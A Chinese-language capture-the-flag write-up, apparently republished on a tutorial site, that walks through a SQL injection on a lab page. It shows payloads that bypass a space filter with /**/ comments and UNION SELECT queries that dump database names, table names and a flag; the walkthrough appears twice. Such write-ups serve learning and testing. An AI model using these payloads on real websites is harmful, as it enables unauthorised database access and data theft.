分享一個(gè)簡單的sql注入
所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來說,它是利用現(xiàn)有應(yīng)用程序,將(惡意)的SQL命令注入到后臺(tái)數(shù)據(jù)庫引擎執(zhí)行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫,而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語句。比如先前的很多影視網(wǎng)站泄露VIP會(huì)員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。
分別輸入1,2,3有對應(yīng)的結(jié)果
使用'會(huì)報(bào)錯(cuò),于是
構(gòu)造常用的sql語句:1' and '1'='1
沒有反應(yīng)試一試1' and '1'='2
還是沒反應(yīng),工具提示,應(yīng)該是過濾了什么,改一下sql語句試一試
1and1=1
可以顯示東西,經(jīng)過判斷過濾了空格,我們使用/**/來代替空格
試一試1'/**/and/**/'1'='1
發(fā)現(xiàn)有結(jié)果了:
于是構(gòu)建sql語句:
判斷有那些數(shù)據(jù)庫:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
可以看到結(jié)果:
查看有哪些數(shù)據(jù)表:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
發(fā)現(xiàn)了flag的表,我們猜測應(yīng)該是在web1數(shù)據(jù)庫中并且字段就是flag(其實(shí)就在本頁面的數(shù)據(jù)庫中)
故:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
本人也是初學(xué)者,參考了許多大佬的wp 自己寫出來后有什么錯(cuò)誤的地方,希望大家指出,謝謝!
根據(jù)頁面提示,到底過濾了什么東西?可以知道一定過濾了什么....
分別輸入1,2,3有對應(yīng)的結(jié)果
使用'會(huì)報(bào)錯(cuò),于是
構(gòu)造常用的sql語句:1' and '1'='1
沒有反應(yīng)試一試1' and '1'='2
還是沒反應(yīng),工具提示,應(yīng)該是過濾了什么,改一下sql語句試一試
1and1=1
可以顯示東西,經(jīng)過判斷過濾了空格,我們使用/**/來代替空格
試一試1'/**/and/**/'1'='1
發(fā)現(xiàn)有結(jié)果了:
于是構(gòu)建sql語句:
判斷有那些數(shù)據(jù)庫:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
可以看到結(jié)果:
查看有哪些數(shù)據(jù)表:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
發(fā)現(xiàn)了flag的表,我們猜測應(yīng)該是在web1數(shù)據(jù)庫中并且字段就是flag(其實(shí)就在本頁面的數(shù)據(jù)庫中)
故:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
總結(jié)
以上所述是小編給大家介紹的一個(gè)簡單的sql注入,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
- Java面試題解析之判斷以及防止SQL注入
- SQL注入原理與解決方法代碼示例
- 通過ibatis解決sql注入問題
- Win2003服務(wù)器防SQL注入神器--D盾_IIS防火墻
- Sql注入工具_(dá)動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
- Sql注入原理簡介_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理
- 尋找sql注入的網(wǎng)站的方法(必看)
- Mybatis防止sql注入的實(shí)例
- Hibernate使用中防止SQL注入的幾種方案
- 有效防止SQL注入的5種方法總結(jié)
- 關(guān)于SQL注入中文件讀寫的方法總結(jié)
- 深入了解SQL注入
相關(guān)文章
圖文教程mssqlserver數(shù)據(jù)庫導(dǎo)出到另外一個(gè)數(shù)據(jù)庫的方法
本篇文章通過圖片并茂的方式給大家介紹mssqlserver數(shù)據(jù)庫導(dǎo)出到另外一個(gè)數(shù)據(jù)庫的方法,對mssqlserver數(shù)據(jù)庫導(dǎo)出相關(guān)知識(shí)感興趣的朋友一起學(xué)習(xí)吧2015-12-12Sql中將datetime轉(zhuǎn)換成字符串的方法(CONVERT)
這篇文章主要介紹了Sql中將datetime轉(zhuǎn)換成字符串的方法,需要的朋友可以參考下2014-04-04用sql實(shí)現(xiàn)18位身份證校驗(yàn)代碼分享 身份證校驗(yàn)位計(jì)算
這篇文章主要介紹了用SQL寫的18位身份證校驗(yàn)代碼,大家參考使用吧2014-01-01比較詳細(xì)的完美解決安裝sql2000時(shí)出現(xiàn)以前的某個(gè)程序安裝已在安裝計(jì)算機(jī)上創(chuàng)建掛起的文件操作。
比較詳細(xì)的完美解決安裝sql2000時(shí)出現(xiàn)以前的某個(gè)程序安裝已在安裝計(jì)算機(jī)上創(chuàng)建掛起的文件操作。...2007-10-10sqlserver 數(shù)據(jù)庫學(xué)習(xí)筆記
sqlserver 數(shù)據(jù)庫學(xué)習(xí)筆記,學(xué)習(xí)sqlserver的朋友可以參考下。2011-11-11Sql語句與存儲(chǔ)過程查詢數(shù)據(jù)的性能測試實(shí)現(xiàn)代碼
Sql語句 存儲(chǔ)過程查 性能測試對比代碼。2009-04-04MS SQL Server數(shù)據(jù)庫清理錯(cuò)誤日志的方法
SQL服務(wù)器磁盤空間爆滿導(dǎo)致數(shù)據(jù)庫無法訪問。遠(yuǎn)程到服務(wù)器上,發(fā)現(xiàn)原來是SQL錯(cuò)誤日志文件惹的禍,數(shù)據(jù)庫在1秒內(nèi)產(chǎn)生上100M大小的日志,沒多長時(shí)間就將磁盤空間堵滿了,下面說說解決方案2013-11-11利用腳本自動(dòng)安裝SQLServer的實(shí)現(xiàn)步驟分析
在工作中,經(jīng)常被要求一天安裝個(gè)10臺(tái)、8臺(tái)的SQL Server。2010-11-11